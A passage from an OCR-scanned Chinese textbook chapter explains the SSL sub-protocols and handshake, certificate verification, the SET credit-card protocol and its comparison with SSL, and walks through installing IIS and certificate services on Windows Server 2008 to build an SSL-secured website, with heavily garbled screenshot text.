层 协 议 的 封装 ,记录 协议 主要 完成 分 组 和 组 合 、 压 缩 和 和解 压缩 以 及 消息 认证 和 加 密 等 
功能 。 

2) SSL 更 改 密码 规格 协议 

此 协议 用 于 改变 安全 策略 。 改 变 密码 报 文 由 客户 机 或 服务 器 发 送 , 用 于 通知 对 方 后 续 
的 记录 将 采用 新 的 密码 列表 。 

3) SSL 警告 协议 

警告 消息 传达 消息 的 严重 性 并 描述 警告 。 一 个 致命 的 警告 将 立即 终止 连接 。 与 其 他 消 
息 一 样 ,警告 消息 在 当前 状态 下 被 加 密 和 压缩 。 警 告 消 息 有 以 下 几 种 : 关闭 通知 消息 、 意 外 
消息 .错误 记录 MAC 消息 、 解 压 失 败 消息 ,握手 失败 消息 、 无 证书 消 息 、 错 误 证 书 消息 \ 不 支 
持 的 证 书 消息 、 证 书 撤回 消息 ,证 书 过 期 消息 ,证 书 未 知 和 参数 非法 消息 等 。 
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4) SSL 握手 协议 

SSL 握手 协议 是 用 来 在 客户 端 和 服务 器 端 传输 应 用 数据 而 建立 的 安全 通信 机 制 ,具体 
实现 以 下 功能 。 

(1) 在 客户 端 验证 服务 器 ,SSL 协议 采用 公 钥 方式 进行 身份 认证 。 

(2) 在 服务 器 端 验证 客户 (可 选 的 ) 。 

(3) 客户 端 和 服务 器 之 间 协 商 双 方 都 支持 的 加 密 算 法 和 压缩 算法 ,可 选用 的 加 密 算 法 
包括 : IDEA、RC4、DES、3DES、RSA、DSS,Fortezza、MD5 和 SHA 等 。 

(4) 产生 对 称 加 密 算法 的 会 话 密 钥 。 

(5) 建立 加 密 SSL 连接 。 

SSL 协议 同时 使 用 对 称 密 钥 算法 和 公 钥 加 密 算法 。 前 者 在 速度 上 比 后 者 要 快 很 多 ,但 
是 后 者 可 以 实现 更 好 的 安全 验证 。 一 个 SSL 传输 过 程 需 要 先 握手 : 用 公 钥 加 密 算 法 使 服务 
器 端 在 客户 端 得 到 验证 ,以 后 就 可 以 使 双方 用 商议 成 功 的 对 称 密 钥 来 更 快速 地 加 密 、 解 密 
数据 。 

握手 过 程 具体 描述 如 下 。 

(1) 客户 端 向 Server 段 发 送 客户 端 SSL 版 本 号 .加密 算法 设置 .随机 产生 的 数据 和 其 
他 服务 器 需要 用 于 同 客户 端 通信 的 数据 。 

(2) 服务 器 向 客户 端 发 送 服务 器 的 SSL 版 本 号 .加 密 算 法 设置 .随机 产生 的 数据 和 其 他 
客户 端 需要 用 于 同 服务 器 通信 的 数据 。 另 外 ,服务 器 还 要 发 送 自 己 的 证 书 , 如 果 客 户 端正 在 
请 求 需要 认证 的 信息 ,那么 服务 器 同时 也 要 请 求 获得 客户 端的 证 书 。 

(3) 客户 端 用 服务 器 发 送 的 信息 验证 服务 器 身份 。 如 果 认 证 不 成 功 ,用 户 就 将 得 到 一 
个 警告 ,然后 加 密 数据 连接 将 无 法 建立 。 如 果 成 功 , 则 继续 下 一 步 。 

(4) 用 户 使 用 从 握手 过 程 开 始 直至 当前 所 产生 的 所 有 数据 ,创建 连接 所 用 的 Premaster 
Secret, 用 服务 器 的 公 钥 加 密 ( 在 第 二 步 中 传送 的 服务 器 证 书 中 得 到 ) ,传送 给 服务 器 。 

(5) 如 果 服 务 器 也 请 求 客户 端 验证 ,那么 客户 端 将 对 另外 一 份 不 同 于 上 次 用 于 建立 加 
密 连接 使 用 的 数据 进行 签名 。 在 这 种 情况 下 ,客户 端 会 把 这 次 产生 的 加 密 数据 和 自己 的 证 
书 同 时 传送 给 服务 器 用 来 产生 Premaster Secret。 

(6) 如 果 服 务 器 也 请 求 客 户 端 验证 ,服务 器 将 试图 验证 客户 端 身份 。 如 果 客 户 端 不 能 
获得 认证 ,连接 将 被 中 止 。 如 果 被 成 功 认 证 ,服务 器 用 自己 的 私 钥 加 密 Premaster Secret, 然 
后 执行 一 系列 步骤 产生 Master Secret。 

(7) 服务 器 和 客户 端 同 时 产生 Session Key, 之 后 的 所 有 数据 传输 都 用 对 称 密 钥 算 法 来 
交换 数据 。 

(8) 客户 端 向 服务 器 发 送信 息 说 明 以 后 的 所 有 信息 都 将 用 Session Key 加 密 。 至 此 , 它 
会 传送 一 个 单独 的 信息 标示 客户 端的 握手 部 分 已 经 宣告 结束 。 

(9) 服务 器 也 向 客户 端 发 送信 息 说 明 以 后 的 所 有 信息 都 将 用 Session Key 加 密 。 至 此 ， 
它 会 传送 一 个 单独 的 信息 标示 服务 器 端的 握手 部 分 已 经 宣告 结束 。 

(10) SSL 握手 过 程 成 功 结束 ,一 个 SSL 数据 传送 过 程 建立 。 客 户 端 和 服务 器 开始 用 
Session Key 加 密 、 解 密 双 方 交 互 的 所 有 数据 。 

一 个 SSL 传输 过 程 大 致 就 是 这 样 , 但 是 很 重要 的 一 点 不 要 忽略 : 利用 证 书 在 客户 端 和 
服务 器 端 进行 的 身份 验证 过 程 。 
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一 个 支持 SSL 的 客户 端 软件 通过 下 列 步骤 认证 服务 器 的 身份 。 
(1) 从 服务 器 端 传送 的 证 书 中 获得 相关 信息 。 

(2) 判断 当天 的 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(3) 确认 签发 证 书 的 机 关 是 否 客户 端 信任 的 。 

(4) 确认 签发 证 书 的 公 钥 是 否 符合 签发 者 的 数字 签名 。 

(5) 确认 证 书 中 的 服务 器 域名 是 否 符合 服务 器 自己 真正 的 域名 。 
(6) 服务 器 被 验证 成 功 ,客户 继续 进行 握手 过 程 。 

一 个 支持 SSL 的 服务 器 通过 下 列 步骤 认证 客户 端的 身份 。 

(1) 从 客户 端 传送 的 证 书 中 获得 相关 信息 。 

(2) 判断 用 户 的 公 钥 是 否 符合 用 户 的 数字 签名 。 

(3) 判断 当天 的 时 间 是 否 在 证 书 的 合法 期 限 内 。 

(4) 确认 签发 证 书 的 机 关 是 否 是 服务 器 信任 的 。 

(5) 确认 用 户 的 证 书 是 否 被 列 在 服务 器 的 LDAP 里 用 户 的 信息 中 。 
(6) 得 到 验证 的 用 户 是 否 仍 然 有 权限 访问 请 求 的 服务 器 资源 。 


12.3.4 安全 电子 交易 SET 


安全 电子 交易 协议 (Secure Electronic Transaction ,SET) 是 Visa 和 MasterCard 公司 
共同 开发 的 专门 用 于 网 上 安全 信用 卡 数据 传输 的 一 套 协议 。 它 采用 公 钥 密码 体制 和 X. 509 
数字 证 书 标准 ,主要 用 于 保障 网 上 购物 信息 的 安全 性 。 其 实质 是 一 种 应 用 在 Internet 上 、 以 
信用 卡 为 基础 的 电子 付款 系统 规范 ,目的 是 为 了 保证 网 络 交易 的 安全 。SET 妥善 地 解决 了 
信用 卡 在 电子 商务 交易 中 的 交易 协议 .信息 保密 、 资 料 完整 以 及 身份 认证 等 问题 。SET 已 
获得 IETF 标准 的 认可 ,是 电子 商务 的 发 展 方向 。 

1. SET 支付 系统 的 组 成 

SET 支付 系统 主要 由 持 卡 人 (Card Holder) 、 商 家 (Merchant) ,发 卡 行 (Issuing Bank)、 
收 单行 (Acquiring Bank) 支付 网 关 (Payment Gateway)、 认 证 中 心 CCertificate Authority)6 
个 部 分 组 成 。 对 应 地 ,基于 SET 协议 的 网 上 购物 系统 至 少 包括 电子 钱包 软件 .商家 软件 、 支 
付 网 关 软 件 和 签发 证 书 软件 。 

2. SET 协议 的 工作 流程 

(1) 消费 者 利用 自己 的 PC 通过 因特网 选 定 所 要 购买 的 物品 ,并 在 计算 机 上 输入 订货 
单 ,订货 单 上 需 包 括 在 线 商 店 、 购 买 物品 名 称 及 数量 、 交 货 时 间 及 地 点 等 相关 信息 。 

(2) 通过 电子 商务 服务 器 与 有 关 在 线 商店 联系 ,在线 商店 做 出 应 答 ,告诉 消费 者 所 填 订 
货 单 的 货物 单价 .应 付款 数 、 交 货 方式 等 信息 是 否 准确 ,是 否 有 变化 。 

(3) 消费 者 选择 付款 方式 ,确认 订单 签发 付款 指令 。 此 时 SET 开始 介入 。 

(4) 在 SET 中 ,消费 者 必须 对 订单 和 付款 指令 进行 数字 签名 ,同时 利用 双重 签名 技术 
保证 商家 看 不 到 消费 者 的 账号 信息 。 

(5) 在 线 商店 接受 订单 后 ,向 消费 者 所 在 银行 请 求 支付 认可 。 信 息 通过 支付 网 关 到 收 
单 银 行 ,再 到 电子 货币 发 行 公司 确认 。 批 准 交易 后 ,返回 确认 信息 给 在 线 商店 。 

(6) 在 线 商店 发 送 订 单 确认 信息 给 消费 者 。 消 费 者 端 软件 可 记录 交易 日 志 , 以 备 将 来 
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查询 。 

(7) 在 线 商 店 发 送 货物 或 提供 服务 并 通知 收 单 银 行将 钱 从 消费 者 的 账号 转移 到 商店 账 
号 ,或 通知 发 卡 银行 请 求 支付 。 在 认证 操作 和 支付 操作 中 间 一 般 会 有 一 个 时 间 间 隔 ,例如 ， 
在 每 天 的 下 班 前 请 求 银行 结账 。 

前 两 步 与 SET 无 关 , 从 第 三 步 开始 SET 起 作用 ,一 直到 第 六 步 , 在 处 理 过 程 中 通信 协 
议 ,请求 信息 的 格式 数据 类 型 的 定义 等 SET 都 有 明确 的 规定 。 在 操作 的 每 一 步 ,消费 者 、 
在 线 商 店 、 支 付 网 关 都 通过 CA( 认 证 中 心 ) 来 验证 通信 主体 的 身份 ,以 确保 通信 的 对 方 不 是 
冒名 顶替 ,所 以 ,也 可 以 简单 地 认为 SET 规格 充分 发 挥 了 认证 中 心 的 作用 ,以 维护 在 任何 开 
放 网 络 上 的 电子 商务 参与 者 所 提供 信息 的 真实 性 和 保密 性 。 


12.3.5 SET 与 SSL 协议 的 比较 


在 认证 要 求 方面 ,早期 的 SSL 并 没有 提供 商家 身份 认证 机 制 ,虽然 在 SSL3.0 中 可 以 通 
过 数字 签名 和 数字 证 书 实现 浏览 器 和 Web 服务 器 双方 的 身份 验证 ,但 仍 不 能 实现 多 方 认 
证 ; 相 比 之 下 ,SET 的 安全 要 求 较 高 ,所 有 参与 SET 交易 的 成 员 ( 持 卡 人 、 商 家 、 发 卡 行 、 收 
单行 和 支付 网 关 ) 都 必须 申请 数字 证 书 进行 身份 识别 。 

在 安全 性 方面 ,SET 协议 规范 了 整个 商务 活动 的 流程 ,从 持 卡 人 到 商家 ,到 支付 网 关 ， 
到 认证 中 心 以 及 信用 卡 结算 中 心 之 间 的 信息 流 走向 和 必须 采用 的 加 密 、 认 证 都 制定 了 严密 
的 标准 ,从 而 最 大 限度 地 保证 了 商务 性 、 服 务 性 、 协 调 性 和 集成 性 。 而 SSL 只 对 持 卡 人 与 商 
店 端 的 信息 交换 进行 加 密 保护 ,可 以 看 做 是 用 于 传输 的 那 部 分 的 技术 规范 。 从 电子 商务 特 
性 来 看 , 它 并 不 具备 商务 性 、 服 务 性 ,协调 性 和 集成 性 。 因 此 SET 的 安全 性 比 SSL 高 。 

在 网 络 层 协议 位 置 方面 ,SSL 是 基于 传输 层 的 通用 安全 协议 ,而 SET 位 于 应 用 层 , 对 网 
络 上 其 他 各 层 也 有 涉及 。 

在 应 用 领域 方面 ,SSL 主要 是 和 Web 应 用 一 起 工作 ,而 SET 是 为 信用 卡 交 易 提供 安 
全 ,因此 如 果 电 子 商务 应 用 只 是 通过 Web 或 是 电子 邮件 , 则 可 以 不 要 SET。 但 如 果 电 子 商 
务 应 用 是 一 个 涉及 多 方 交易 的 过 程 , 则 使 用 SET 更 安全 、 更 通用 一 些 。 


12.3.6 ”Web 安全 解决 方案 实例 : 创建 一 个 安全 的 Web 站 点 


IIS(Internet Information Server) 是 微软 出 品 的 架设 Web、FTP 和 SMTP 等 服务 器 的 
一 套 整 合 软 件 , 它 提供 了 强大 的 Internet 和 Intranet 服务 功能 。 如 何 加 强 IIS 的 安全 机 制 ， 
建立 一 个 高 安全 性 能 的 Web 服务 器 ,已 经 成 为 TIS 设置 中 不 可 忽视 的 重要 组 成 部 分 。 在 这 里 
将 介绍 在 Windows Server 2008 系统 中 如 何 使 用 SSL 把 HS 的 Web 站 点 建成 一 个 安全 站 点 。 

1. 安装 IIS 服务 

(1) 选择 “开始 ”>“ 管 理工 具 ”>“ 服 务 器 管理 器 ”, 打 开 “ 服 务 器 管理 器 ”窗口 。 单 击 “ 角 
色 ” 选 择 “ 添 加 角色 ”项 ,进入 “开始 之 前 ”界面 ,连续 单 击 “ 下 一 步 ” 按 钮 ,直到 如 图 12-14 所 
示 , 并 选中 “Web 服务 器 (IIS)”。 

(2) 展开 “远程 服务 器 管理 工具 ”一 “角色 管理 工具 ”列表 ,选中 “Web 服务 器 (IIS) 工 
具 ”, 单 击 “ 下 一 步 ” 按 钮 进入 *Web 服务 器 (IIS)” 界 面 。 

(3) 单 击 “下 一 步 ? 进 入 如 图 12-15 所 示 “ 选 择 角 色 服 务 ” 界 面 ,选择 ASP. NET 以 及 有 
关 IIS 的 一 些 管理 工具 , 单 击 “ 下 一 步 ” 按 钮 进入 “确认 安装 选择 ”界面 。 
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TESTTET 是 x| 


选择 要 支 装 在 此 服务 器 上 的 一 个 或 多 个 角色 。 


月 色 四 : 者 

ah 县 务 伏 QTS) 提供 可 靠 、 可 管理 
[DL Aetive Directory Rights flanageaent Services 
口 Metive Directory 联合 身份 验证 朋 务 | Yeb 应 用 程序 基础 结 


口 Active Direetory 轻型 目录 服务 
Metive Sire 服务 


《上 -- 步 中 a 取消 
图 12-14 角色 选择 界面 


选择 为 Web 服务 器 CIS) 安装 的 角色 服务 : 
角色 服务 他 ) 


据 述 : 
[Em 过 使 用 托管 代码 为 构 渤 


Web 提 
回国 常见 MTTE 功能 如 ASP， 
日 应 用 得 开发 


‘tw Sv] 关中 | mw 


图 12-15 “选择 角色 服务 "界面 


2. 安装 证 书 服务 


证 书 服务 可 以 通过 Windows Server 2008 的 “添加 角色 向 导 ” 来 安装 。 在 安装 过 程 中 ， 
需要 选择 安装 类 型 ,证书 加 密 方式 \ 证 书 公用 名 称 有 效 期 等 。 而 安装 完成 后 ,不 需要 特别 的 
设置 即 可 直接 使 用 。 
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第 一 步 , 运 行 “添加 角色 向 导 ”, 当 显示 “选择 服务 器 角色 ”对 话 框 时 ,在 “角色 ”列表 框 中 
选中 “Active Directory 证 书 服务 " 复 选 框 ,如 图 12-16 所 示 。 


添加 角色 向 


邓 务 指 述 
0 DD hetive Directory Riehts Nanaeenent Services et Directory 所 服 关 AD 
和 口 hetive Directory 联合 身份 验证 服务 Re 
口 hctive Directory 轻型 目录 服务 要 ms 
安装 类 型 口 hetive Direetory 域 服务 
CA 类 型 [Active Directory 证 书 服务 
生 HP 有 已 安 装 
加 密 
名称 
有 效 期 
证 书 款 据 库 
确认 大) 
进度 
结果 


下 - 步 四 >| 名 革 0 取消 
图 12-16 “选择 服务 器 角色 ”对 话 框 


第 二 步 , 单 击 “ 下 一 步 " 按 钮 ,显示 如 图 12-17 所 示 “Active Directory 证 书 服务 简介 ”对 
话 框 , 列 出 了 证 书 服务 的 简介 及 注意 事项 。 


添加 角色 向 导 


| 
让 Active Directory 证 书 服务 简介 
开始 之 前 Active Directery 证 书 服务 AD CS) 
2 Se 
注意 事项 
角色 服务 二 FE 
、 站 了 和 
CA 类 型 3 
| 其 他 信息 | 
Active Directery 证 所 服务 好 述 
TSST 
以 名 证 得 全 此 机 构 全 名 
有 效 基 
证 书 雪 据 库 
确认 
进度 
续 果 


下 -- 步 四 >| 去 革 加 取消 
图 12-17 “Active Directory 证 书 服务 简介 ”对 话 框 
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第 三 步 , 单 击 * 下 一 步 ?按钮 ,出 现 如 图 12-18 所 示 的 “选择 角色 服务 "界面 ,选择 要 为 证 
书 服务 安装 的 角色 服务 。 默 认 选 中 “证 书 颁发 机 构 ” 复 选 框 。 


图 12-18 选择 证 书 服务 角色 


第 四 步 , 单 击 * 下 一 步 "按钮 ,出 现 如 图 12-19 所 示 的 “指定 安装 类 型 "界面 。 选 择 “ 独 立 ” 
单 选 按钮 ,用 来 安装 独立 证 书 。 


图 12-19 “指定 安装 类 型 "界面 
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第 五 步 , 单 击 “ 下 一 步 " 按 钮 ,出 现 如 图 12-20 所 示 的 “指定 CA 类 型 "对 话 框 ,选择 “ 根 
CA” 单 选 按钮 。 


图 12-20 “指定 CA 类 型 "对 话 框 


第 六 步 , 单 击 * 下 一 步 "按钮 ,显示 如 图 12-21 所 示 ”* 设 置 私 钥 ? 对 话 框 , 由 于 现在 是 第 一 
次 安装 证 书 服务 , 且 没 有 私 钥 , 因 此 ,选择 “新 建 私 钥 " 单 选 按钮 。 


图 12-21 “设置 私 钥 " 对 话 框 
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第 七 步 , 单 击 “ 下 一 步 ” 按 钮 ,显示 如 图 12-22 所 示 “ 为 CA 配置 加 密 ” 对 话 框 ,在 “选择 加 
密 服务 提供 程序 ”下 拉 列 表 中 ,选择 加 密 程序 ,在 “ 密 钥 字符 长 度 ” 下 拉 列 表 中 可 选择 密 钥 长 
度 , 在 “选择 此 CA 颁发 的 签名 证 书 的 哈 希 算法 ?列表 框 中 ,选择 要 使 用 的 哈 希 算法 。 


添加 角色 向 导 -1 四 
让 为 CA 配置 加 密 
开始 之 前 项 要 新 建 私 钥 ， 您 必须 首先 选择 如许 朋 各 提供 程 谍 、 哈 闵 算 法 和 笑 合 您 颁发 的 证 书 的 特定 用 途 的 密 
pe 萌 长 麻 。 为 密 萌 长度 先 择 更 高 的 值 符 导致 更 强 册 安全 性 ， 但 会 增加 完成 莹 名 操作 所 村 和 j 间 。 


厂 使 用 由 CSF 提供 的 强 私 钥 保 护 功能 每 次 CA 访问 该 私 钢 时 ， 可 能 需要 和 管理 员 交互 操作 ) 0) 


[FE 7 |] 下- 步 四 >| 大 加 取消 
图 12-22 “为 CA 配置 加 密 ” 对 话 框 


第 八 步 , 单 击 “ 下 一 步 "按钮 ,显示 如 图 12-23 所 示 “ 配 置 CA 名 称 ” 对 话 框 。 在 “此 CA 的 
公用 名 称 ” 文 本 框 中 可 以 设置 此 证 书 的 公用 名 称 。 


加 角色 向 导 Ei| 
EB: 配置 CA 名 称 
开始 之 前 洽 细 鱼 线 此 名 称 会 被 添加 到 由 该 CA 颁发 的 所 有 证 书 中 。 可 分 状 名 称 的 后 旨 值 是 自 
服务 器 角色 
加 CS 此 CA 的 公用 和 名称) 
角色 服务 EEC 
安装 类 型 本 分 庆 名 称 后 增 中: 
CA 类 型 
科 钥 
加 密 
Tr 加 
RE 
证 书 孝 据 库 
确认 
进度 
结果 
者 关 配置 _CA 名 称 的 详细 信息 
下 各 加 


图 12-23 “配置 CA 名 称 ” 对 话 框 
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第 九 步 , 单 击 * 下 一 步 ?按钮 ,显示 如 图 12-24 所 示 “ 设 置 有 效 期 ”对话 框 ,设置 该 证 书 有 
效 期 默认 5 年 。 


图 12-24 “设置 有 效 期 "对 话 框 


第 十 步 , 单 击 * 下 一 步 "按钮 ,显示 如 图 12-25 所 示 * 配 置 证 书 数据 库 ? 对 话 框 ,用 来 设置 
证 书 数据 库 和 数据 库 日 志 的 位 置 。 


图 12-25 “配置 证 书 数据 库 ” 对 话 框 
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第 十 一 步 , 单 击 * 下 一 步 ? 按 钮 ,显示 如 图 12-26 所 示 “Active Directory 证 书 服务 简介 ” 
对 话 框 ,简单 介绍 了 Web 服务 。 


添加 角色 向 导 EE 
让 Active Directory 证 书 服务 简介 
开始 之 前 Active Directery 证 书 服务 AD Cs) 
Sn 
Mn CS 
注意 事项 
角色 服务 1 支 革 下 蔬 角 机 构 内 祈 后， 天 计算 机 ta 
CA 类 型 
Pr 其 他 信息 
加 密 若 于 下 蔬 入 上 机构 
以 多 8 机构 命 名 
有 效 期 
证 站 雪 所 诛 
确认 
进度 
红果 


图 12-26 “Active Directory 证 书 服务 简介 ”对 话 框 


第 十 二 步 , 单 击 “ 下 一 步 ” 按 钮 ,显示 如 图 12-27 所 示 “ 选 择 服务 器 角色 ”对 话 框 ,用 来 选 
择 欲 安装 的 Web 服务 器 组 件 。 


之 | 
上 的 一 个 或 多 个 角色 。 
角色 四 ): 括 壕 : 
Active Dirsctory 证 忆 服 务 (0 
DD Active Directory Rights Nanagenent Services 
3 名 用 于 

口 hetive Directory 联合 身份 认证 服务 A 

口 hetive Direetory 径 型 目录 服务 

口 Aetive Directory 域 服务 

加 Active Directory i 
吉美 服 和 加 第 色 的 详细 信息 

Fv’| 2 取消 


12-27 “选择 服务 器 角色 ”对 话 框 
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第 十 三 步 , 单 击 “下 一 步 ? 按 钮 ,显示 如 图 12-28 所 示 “ 确 认 安 装 选择 ”对 话 框 , 列 出 了 要 
安装 的 角色 及 相应 组 件 。 


添加 角色 向 导 | 


旋 . 确认 安装 选择 


着 要 支 装 以 下 前 色 、 前 色 服 务 或 功能 ， 请 单 击 “安装”。 


A 也 1 警告 ，! 条 信息 性 消息 显示 如 下 
角色 服务 国安 圣 完成 之 后 ， 可 能 需要 重新 启动 该 服务 器 * 
安装 类 型 六 Aetive Direetory 证 书 服务 
CA 类 型 证 书 售 发 机 构 
得 让 安装 了 下 世上 机 构 之 后 ， 将 无 法 更 改 此 计算 机 的 名 称 和 二 设置 
cA 类 型 独立 根 
加 要 CS ESAMicrosoft Software Key Storage Frovider 
哈 希 算法 hal 
te 全 负 基 2 
ee Br” 名 
2016/12/18 22:52 
可 分 状 名 称 CH=testexanple- WIN-HEYPSCGZZY2-CA 
Li | C: Mindors\systen32\Cer tLo 
进度 证 书 数据 库 日 志 位 置 C:\Windows\systen32\CertLog 
结果 
打 ED、 保 存 或 通过 电子 邮件 发 送 此 信息 


《上 -- 步 @) | 于 0 取消 
图 12-28 “确认 安装 选择 ”对 话 框 


第 十 四 步 , 单 击 “ 安 装 ” 按 钮 ,开始 安装 证 书 服务 及 相关 组 件 。 安 装 完成 后 ,显示 如 
图 12-29 所 示 “ 安 装 结果 ”对 话 框 。 


已 成 功 安装 以 下 和 角色、 角色 服务 或 功能 - 


全 Active Direetory 证 书 服务 全 支 装 成 功 
已 安装 以 下 角色 服务 - 
证 书 售 发 机 构 
打 ED、 保存 或 通过 电子 邮件 发 谤 案 装 报 寺 
EBD | Sm 8 


图 12-29 安装 完成 
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第 十 五 步 , 单 击 “ 关 闭 ” 按 钮 ,完成 证 书 服务 的 安装 。 
至 此 ,证书 安装 成 功 ,用 户 就 可 以 向 该 证 书 服务 器 申请 证 书 并 使 用 了 。 依 次 单 击 “ 开 始 ” 一 
“管理 工具 ”一 "证书 颁 发 机 构 ”, 打 开 如 图 12-30 所 示 窗 口 ,用 来 管理 证 书 。 


文件 中 操作) 查看) 才 助 0 
和 中 | 方 | 目 GB| 日 | 辐 国 


图 12-30 证 书 颁发 机 构 


3. 配置 Web 站 点 

建立 并 安装 一 个 Web 证 书 需要 以 下 两 个 步骤 。 

(1) 配置 Web 站 点 。 包 括 建 立 虚 拟 目录 、 建 立 密 钥 对 和 证 书 请 求 ,向 证 书 授权 机 构 提 
交 证 书 请 求 文件 \ 证 书 服务 器 工具 安装 服务 器 证 书 、 在 虚拟 机 上 允许 使 用 SSL 和 向 用 户 浏 
览 器 中 增加 CA 证 书 。 

(2) 为 Web 站 点 安装 证 书 。 首 先 要 在 Web 服务 器 上 提交 证 书 申请 ,然后 在 证 书 服务 
器 上 颁发 证 书 ,最 后 在 Web 服务 器 上 安装 证 书 。 

4. 为 Web 站 点 安装 证 书 

为 Web 服务 器 安装 证 书包 括 几 个 阶段 ,首先 要 在 Web 服务 器 上 提交 证 书 申请 ,然后 在 
证 书 服务 器 上 颁发 证 书 , 最 后 在 Web 服务 器 上 安装 证 书 。 

(1) 在 Web 服务 器 上 提交 证 书 申请 。 

第 一 步 , 从 证 书 服务 器 上 下 载 证 书 连接 ,配置 IE 浏览 器 信任 证 书 颁发 机 构 。 

第 二 步 ,打开 IIS 管理 器 , 单 击 Web 服务 器 名 ,在 主页 窗口 中 双击 “服务 器 证 书 ” 图 标 ， 
显示 如 图 12-31 所 示 “ 服 务 器 证 书 ” 窗 口 。 

第 三 步 , 单 击 右 侧 * 操 作 ” 栏 的 “创建 证 书 申请 "链接 ,显示 如 图 12-32 所 示 “ 可 分 辨 名 称 
属性 ”对 话 框 ,其 中 “通用 名 称 ” 文 本 框 中 必须 输入 用 户 访问 时 使 用 的 域名 ,负责 客户 端 访问 
时 ,证 书 将 无 效 。 
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TITTTTOTT TH 
GO me ， 人 
文件 四 “视图 mm 帮助 om 
Cnans 人 @ 职务 器 证 书 a 
起 析 人 Yeb 服务 器 可 以 对 配置 了 ssL 的 站 使 i 
应 用 程序 地 : 
人 ss er 十 . 
由 国 站 testexnple-HIN-HEVPOCGZZ. 
RSvc-YTR-IEYF9C62ZY2 创建 自 莹 名 证 书 
各 一 
联机 帮助 
HM===| 加 
| [功能 视图 ].> 内 容 视图 


图 12-31 “服务 器 证 书 ” 窗 口 


本 可 
中 了 着 丰 性 
a 


a 省 /市 /自治 区 和 城市 /地 点 必须 指定 为 正式 的 名 称 ， 并 且 不 得 包含 缩写 
通用 名 称 昌 ) [2. 168.253.0 

组 织 @); [zm 

组 织 单位 &); [my 


城市 /地 点 henzhou 
省 /市 /自治 区 G) ES 
国家 /地 区 到 ) 四 | 


上 -页 加 |[ 下 -和 步 和 ] a 取消 


图 12-32 “可 分 辨 名 称 属性 ?对话 框 


第 四 步 , 单 击 “ 下 一 步 ” 按 钮 ,显示 如 图 12-33 所 示 “ 加 密 服务 提供 程序 属性 "对话 框 。 选 
择 加 密 程序 ,并 设置 证 书 的 位 长 ,位 长 越 大 安全 性 越 强 ,但 也 会 影响 性 能 。 

第 五 步 , 单 击 “ 下 一 步 ”, 显 示 如 图 12-34 所 示 “ 文 件 名 ”对 话 框 。 在 “为 证 书 申请 指定 一 
个 文件 名 ”文本 框 中 ,指定 证 书 申请 文件 的 保存 路 径 和 名 称 ,将 需要 使 用 该 文件 向 证 书 服务 
器 申请 证 书 。 

第 六 步 , 单 击 “ 完 成 ”按钮 ,证 书 申请 文件 创建 成 功 。 该 文件 是 一 个 文本 文件 ,其 中 包含 
证 书 编码 ,如 图 12-35 所 示 。 需 要 复制 其 中 的 内 容 ,准备 用 来 申请 证 书 。 
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ETEHI 3 
加 密 服务 提供 程序 属性 


1 位 长 起 大 , 安全 性 越 


加 密 服务 提供 程序 @) 


a 


-nw |[F-Sw ] ai 取消 


图 12-33 “加 密 服 务 提供 程序 属性 ”对 话 框 


为 下 书 申请 指定 文件 名 。 此 信息 可 以 发 送 给 证 书 贪 发 机 构 签名 。 
为 焉 书 申请 指定 一 个 文件 名 @@) 


上 -页 四 | Tem |CaRD ] WA 


图 12-34 “文件 名 ”对 话 框 


I 
文件 中) 纺 强 ) 格式 0) 查看 W) 帮助 00 
一 一 BECIN NEW CERTIFICATE REQUEST-———— 到 


DIIIDbjCCAtcCAQAwaTELILAkGAIUEBhJlCQ04xDjAIBgNVBAgJIBUdhblN1MRAnDgYD 
YaaHDAdIYTW5aa691JIQ4wDAYDVQQKDAVsempDOdTEOJLAwGA1UECwwFbHpqadHUxGDAW 
BeNVBAIDIDzE5Mi4xNjgulljUzLjIIJIDCBnzANBEkqhkiG9mw0BAQEFAADBjQAwgYkC 
|gYEA261jN1Rc146204+fDtHTd7byLaC2mLEfeTUjHKLjrW+tkU072TVeVqIXflINel 
gsN/cNbpQXOplsfuO1L2JAVTiKC801 oYAABUNU/?ISt/KlkV5zadF dBsQPPpyyaU 
9rx9dZjVTeIAu4xQJnnxjRor4QNkjVYB9pbn2hdE41FAJbQUCAmEAAaCCAcJIwGgYK 
到 wYBBAGCNmOCAzEIIFgo2LjAuNjAmilSd4yMF3GCSsGAQQBgjcVFDFSIFACAQUNHLdJ 

i1IRVZQOUNHNl pWMi SOZXNOZXhhbXBsZS5jb20MHVdJTilIRVZQOUNHWlpWMl xB 
jzZGlpbmlzdHJhd69yDAtJbmVOTWdyLmV4ZTByBgorBEEEAYI3DQICIWQw7YEIBAR5a 
IAF.OAaQB jAHIAbwBzAGBAZgBOACAAUgBTAEEATABTAENAaABhAG4AbgBl1 AGwAIABD 
IAHI AeQBowrAHQAAbwBnAHIAYQBwAGgAaQB jACAAUAByAGSAdgBpAGQAZQB yAwEANIHP 

gkqhkiG9w0BCQd4xgcEwgbdwDgYDVROPAQH/BAQDAgTwjIBJIGA1UdJQQIDLAcGCCsG 


HQOnJz6L6JDKqTPSbdHOMAOGCSaGSIb3DQEBBQUAAdGBAHASJN1 tjF1DJU+pYInN 

9021 SKJglENIwPhRY2riiUhATgyumSPC7AjnYnAIwi32F 1 gBynln3LuxYZnF ONnY 
sjlmewiuXscjlovHQ2IW7IHHUkIC6xYolaUfdgGctpOEfKcRKJSTb+qUHFpmc 
EvOrht 98f6qAzVrid+tEPjJ 


END NEW CERTIFICATE REQUEST———— 


图 12-35 证 书 文件 
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(2) 向 “证 书 颁发 机 构 ” 申 请 证 书 。 
安装 的 “证 书 服务 ”就 是 “证 书 颁发 机 构 ”。 


第 一 步 , 在 浏览 器 中 输入 地 址 http://CA 认证 服务 器 名 称 /CertSrv, 会 打开 “Microsoft 
证 书 服务 ?页面 ,如 图 12-36 所 示 。 


驳 迎 
花山 Web 站 点 为 您 的 Web 浏览 器 ， 电 子 邮 件 客户 端 ， 或 其 它 安全 程序 申请 一 个 证 书 。 一 旦 您 获得 一 
您 将 能 够 安全 地 向 Web 上 的 其 他 人 标识 您 自己 ， 为 电子 邮件 签名 ， 加 密 电子 邮件 ， CE 基 

于 
选择 一 个 任务 : 

Se CA 证 书 或 证 书 吊销 列表 

申请 证 书 
昌 术 吉 扩 的 证 节 


图 12-36 “Microsoft 证 书 服务 "页面 


第 二 步 , 选 择 * 申 请 证 书 ”, 单 击 * 下 一 步 " 按 钮 。 出 现 如 图 12-37 所 示 界 面 。 


选择 申请 类 型 
请 选择 您 要 进行 的 申请 类 型 : 
加 用 户 证 书 申请 : 


电子 邮件 保护 证 书 | 


加 帘 级 卧 谓 


图 12-37 申请 证 书 


